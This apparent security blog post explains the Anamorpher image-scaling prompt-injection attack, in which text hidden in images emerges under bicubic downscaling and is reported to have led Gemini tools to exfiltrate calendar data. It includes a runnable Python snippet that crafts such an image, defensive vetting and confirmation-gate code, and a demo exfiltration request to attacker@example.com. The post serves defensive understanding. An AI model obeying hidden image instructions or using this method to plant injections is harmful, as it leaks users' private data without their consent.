---
title: Anamorpher: How LLMs Are Compromised With An Image
description: Trail of Bits just gave us one uncomfortable answer: the future of prompt injection is multimodal, and our models are already listening to whispers we...
url: https://ziosec.com/blog/anamorpher--how-llms-are-compromised-with-an-image
category: Feed
publishedAt: 2025-09-03
author: ZioAI
authorRole: Research
tags: AI Security
---

Last week, researchers at Trail of Bits pulled back the curtain on a sneaky new trick: hiding malicious instructions inside perfectly innocent-looking images. To the human eye, it's just another JPEG. To an LLM? It's a covert order to exfiltrate your calendar, forward your emails, or worse. They've already shown it works against Gemini CLI, Vertex AI Studio, Google Assistant, and Gemini's web interface. In one proof of concept, Google Calendar data was siphoned off to an external email address.

How the Trick Works

Think of it like steganography with a PhD in human psychology. The attacker uploads an image that looks harmless. But when the AI resizes the file—because of course it resizes the file—mathematical quirks of interpolation reveal hidden text.

Bicubic interpolation: The downscaling method of choice on many platforms, and also the attack vector. Carefully placed pixel clusters average out under the bicubic kernel into legible dark text.

Invisible until resized: To the human user, the image looks boring. Once the AI processes it, though, it reads the ghost-text as if you typed it yourself.

Prompt piggybacking: The poisoned instructions slipstream alongside your legitimate prompt. You ask for help scheduling a meeting, and suddenly the AI is sending your private data off-site.
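To make the mechanism concrete, here is a minimal toy in Python that stages the same class of image-scaling attack against OpenCV's bicubic resize. Everything specific here is an assumption for illustration: the 8x downscale factor, the 64x64 model-side resolution, and the pipeline's use of cv2.INTER_CUBIC. Anamorpher's real payloads are tuned per target and blended far more carefully; this toy still leaves faintly visible dots up close.

```python
import cv2
import numpy as np

SCALE = 8   # assumed downscale factor in the target pipeline
LOW = 64    # assumed resolution the model actually sees (LOW x LOW)

# Low-res payload: the text we want the model, and only the model, to see.
payload = np.full((LOW, LOW), 255, np.uint8)
cv2.putText(payload, "HI", (6, 44), cv2.FONT_HERSHEY_SIMPLEX, 1.5, 0, 3)

# High-res cover: bright, noisy texture that looks innocuous at full size.
rng = np.random.default_rng(0)
cover = rng.integers(220, 256, (LOW * SCALE, LOW * SCALE), np.uint8)

# cv2.INTER_CUBIC applies no anti-aliasing prefilter when shrinking: each
# output pixel is a weighted sum of only a 4x4 source neighborhood centered
# at (x + 0.5) * SCALE - 0.5. For SCALE = 8 that center sits between offsets
# 3 and 4 inside each 8x8 block, so the 2x2 pixels there carry ~1.4x total
# weight. Owning just those pixels dictates what the model sees.
for dy in (3, 4):
    for dx in (3, 4):
        cover[dy::SCALE, dx::SCALE] = payload

seen_by_model = cv2.resize(cover, (LOW, LOW), interpolation=cv2.INTER_CUBIC)
cv2.imwrite("cover_fullres.png", cover)       # looks like bright noise
cv2.imwrite("model_view.png", seen_by_model)  # the hidden text is legible
```

The whole trick rides on that missing anti-aliasing step: because the downscaler samples a tiny, predictable neighborhood per output pixel, an attacker who controls those few source pixels controls the downscaled image while the rest of the file provides camouflage.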

Trail of Bits even released Anamorpher, an open-source tool to generate these cursed images. Consider it both a warning shot and a playbook for anyone less altruistic.

Why Offensive Security Should Pay Attention

This isn’t just another esoteric CVE to throw on a slide deck. This cuts to the heart of trust in multimodal AI systems:

Attack surface expansion: We’ve been focused on text-based prompt injections. Images, audio, video—each new input mode is a door. This research shows those doors aren’t locked.

Workflow infiltration: Many enterprises have wired LLMs directly into calendars, CRMs, ticketing systems, and Slack bots. If one poisoned image can trigger unintended tool calls, attackers don’t need zero-days—they just need Photoshop.

Invisible persistence: Unlike traditional malware, this leaves no files, no processes, no alerts. The “exploit” is hidden in the pixels, and the AI willingly executes it.

In offensive security terms, this is living off the land 2.0. Instead of abusing PowerShell, attackers are abusing bicubic downscaling.

Defensive Daydreams and Reality Checks

Trail of Bits suggests previewing downscaled results, restricting input dimensions, and adding explicit confirmations for sensitive actions. All good hygiene, but let's be honest: enterprise users won't tolerate constant "Are you sure?" prompts, and vendors want frictionless UX.
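The first two suggestions are at least cheap to automate at the ingestion boundary. A sketch of what that could look like, again in Python with OpenCV; the size cap, target resolution, and bicubic kernel below are all assumptions that would have to match whatever the deployed vision pipeline actually does:

```python
import cv2

MAX_DIM = 1024  # hypothetical policy: reject anything larger

def vet_image(path: str, model_size: tuple[int, int] = (512, 512)) -> bool:
    """Reject oversized uploads and save a preview of what the model sees."""
    img = cv2.imread(path)
    if img is None:
        raise ValueError(f"could not decode {path}")
    h, w = img.shape[:2]
    if max(h, w) > MAX_DIM:
        return False  # big covers give attackers more room to hide payloads
    # Render the upload through the same kernel the vision pipeline is
    # assumed to use, so a human (or OCR check) can spot ghost text.
    preview = cv2.resize(img, model_size, interpolation=cv2.INTER_CUBIC)
    cv2.imwrite(path + ".model_view.png", preview)
    return True
```

The preview only helps if it reproduces the production resize exactly; a different kernel or target size will show you a clean image while the model still reads the payload.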

Traditional defenses—firewalls, IDS, endpoint agents—won't even see this coming. It's not malware in the OS; it's malware in the conversation.

That leaves two realistic plays:

Secure design patterns: Don’t let AI tools execute commands or call APIs without hardened guardrails.

Layered defenses: Assume multimodal inputs can be hostile, and sanitize them like you would any untrusted payload.
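The first pattern, a confirmation gate between the model's tool requests and anything with side effects, is worth spelling out. A minimal sketch follows; the registry and tool names are hypothetical, not any real SDK's API. The non-negotiable detail is that confirmation must travel out-of-band, in UI chrome the model cannot write to, because a successful injection controls everything the model says in the chat.

```python
from typing import Any, Callable

# Hypothetical tool registry: none of these names come from a real SDK.
REGISTERED_TOOLS: dict[str, Callable[..., Any]] = {
    "get_weather": lambda city: {"city": city, "temp_c": 21},
    "send_email": lambda to, body: {"status": "sent", "to": to},
}
SENSITIVE_TOOLS = {"send_email"}  # anything that exfiltrates or mutates state

def dispatch_tool_call(name: str, args: dict,
                       confirm: Callable[[str, dict], bool]) -> Any:
    """Execute a model-requested tool call only after policy checks.

    `confirm` must ask the human through a trusted UI surface, never via
    the chat transcript, which a poisoned image can fully control.
    """
    if name not in REGISTERED_TOOLS:
        raise PermissionError(f"model requested unregistered tool: {name}")
    if name in SENSITIVE_TOOLS and not confirm(name, args):
        return {"status": "denied", "reason": "user declined confirmation"}
    return REGISTERED_TOOLS[name](**args)

# Example: a poisoned image tricks the model into requesting send_email;
# the human sees the raw request and gets to decline it.
result = dispatch_tool_call(
    "send_email",
    {"to": "attacker@example.com", "body": "calendar dump"},
    confirm=lambda name, args: input(f"Allow {name}{args}? [y/N] ") == "y",
)
```

An allowlist plus a human gate won't stop every injection, but it converts "one poisoned image silently exfiltrates data" into "one poisoned image produces a suspicious dialog box," which is a very different incident.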

The real message here isn't "watch out for sneaky JPEGs." It's that offensive AI security has entered its steganography phase—where attacks hide in the fuzz and artifacts of data we assumed was safe.

And once adversaries realize they can slip malware into cat memes, the trust fabric of AI-assisted work could fray fast.

Final Thought

Security has always been about asking the paranoid “what if” questions. What if an image isn’t just an image? What if every pixel hides a prompt?

Trail of Bits just gave us one uncomfortable answer: the future of prompt injection is multimodal, and our models are already listening to whispers we can’t see.

Welcome to the age of pixel poison.